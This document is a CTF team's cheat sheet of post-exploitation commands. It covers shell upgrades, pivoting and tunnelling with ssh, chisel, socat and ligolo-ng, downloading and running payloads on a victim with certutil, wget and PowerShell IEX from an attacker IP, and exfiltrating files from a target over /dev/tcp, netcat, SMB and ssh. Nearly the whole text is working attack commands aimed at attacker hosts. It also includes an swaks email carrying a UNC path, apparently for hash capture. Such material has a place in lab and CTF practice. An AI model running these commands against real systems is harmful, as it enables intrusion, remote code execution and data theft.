A collection of commands, tools, techniques and procedures of the purplestorm ctf team.
script /dev/null -c bash
CTRL+Z
stty raw -echo; fg
reset
screen
On kali:
ssh -N -L 80:localhost:80 user@10.10.10.10 -C
./chisel server -p 8000 --reverse #Server -- Attacker
./chisel client 10.10.16.3:8000 R:100:172.17.0.1:100 #Client -- Victim
On victim:
socat tcp-listen:8080,reuseaddr,fork tcp:localhost:9200 &
On victim:
nc -nlvp 8080 -c "nc localhost 1234"
cmd:
iwr -uri "http://10.10.10.10:8080/shell.exe" -outfile "shell.exe"
wget -O shell.exe 10.10.10.10:8000/shell.exe
certutil -urlcache -f http://10.10.10.10:8000/shell.exe C:\inetpub\shell.exe
Powershell:
Invoke-WebRequest http://10.10.10.10:8000/shell.exe -OutFile shell.exe
powershell "(new-object System.Net.WebClient).Downloadfile('http://10.10.10.10:8000/shell.exe', 'shell.exe')"
powershell "IEX(New-Object Net.WebClient).DownloadString('http://10.10.10.10:8000/something.ps1')"
via SMB:
sudo python3 /usr/share/doc/python3-impacket/examples/smbserver.py kali . # On attacker
copy \\10.10.10.10\kali\reverse.exe C:\PrivEsc\reverse.exe # On target
wget http://10.10.10.10:8000/some.sh
curl -o some.sh http://10.10.10.10:8000/some.sh
via base64:
cat shell.sh | base64 -w 0 # On attacker
echo <base64encoded> | base64 -d > shell.sh # On target
via scp:
scp some.sh user@10.10.10.10:/tmp/some.sh # On attacker
swaks --server example.com --port 587 --auth-user "user@example.com" --auth-password "password" --to "user@target.com" --from ""user@example.com" --header "Subject: foobar" --body "\\\<LHOST>\x"
$ sudo ip tuntap add user $(whoami) mode tun ligolo
$ sudo ip link set ligolo up
$ ./proxy -laddr <LHOST>:443 -selfcert
$ ./agent -connect <LHOST>:443 -ignore-cert
ligolo-ng Β» session
[Agent : user@target] Β» ifconfig
$ sudo ip r add 172.16.1.0/24 dev ligolo
[Agent : user@target] Β» start
[Agent : user@target] Β» listener_add --addr <RHOST>:<LPORT> --to <LHOST>:<LPORT> --tcp
pip install pwncat-cs
Listener: pwncat-cs 192.168.1.1 4444
(To change from pwncat shell to local shell, use Ctrl+D)
On kali:
nc -nlvp 80 > datafolder.tmp
On target:
tar zcf - /tmp/datafolder | base64 | dd conv=ebcdic > /dev/tcp/10.10.10.10/80
On kali:
dd conv=ascii if=datafolder.tmp | base64 -d > datafolder.tar
tar xf datafolder.tar
On target:
tar zcf - /tmp/datafolder | ssh root@<attacker_ip> "cd /tmp; tar zxpf -"
On kali:
cd /tmp/datafolder
via SMB server:
sudo python3 /usr/share/doc/python3-impacket/examples/smbserver.py -username user -password pass share . -smb2support # On kali
net use \\10.10.16.5\share /u:user pass # On victim
copy C:\Users\user\Desktop\somefile.txt \\10.10.16.5\share\somefile.txt # On victim
via pscp:
pscp Administrator@10.10.10.10:/Users/Administrator/Downloads/something.txt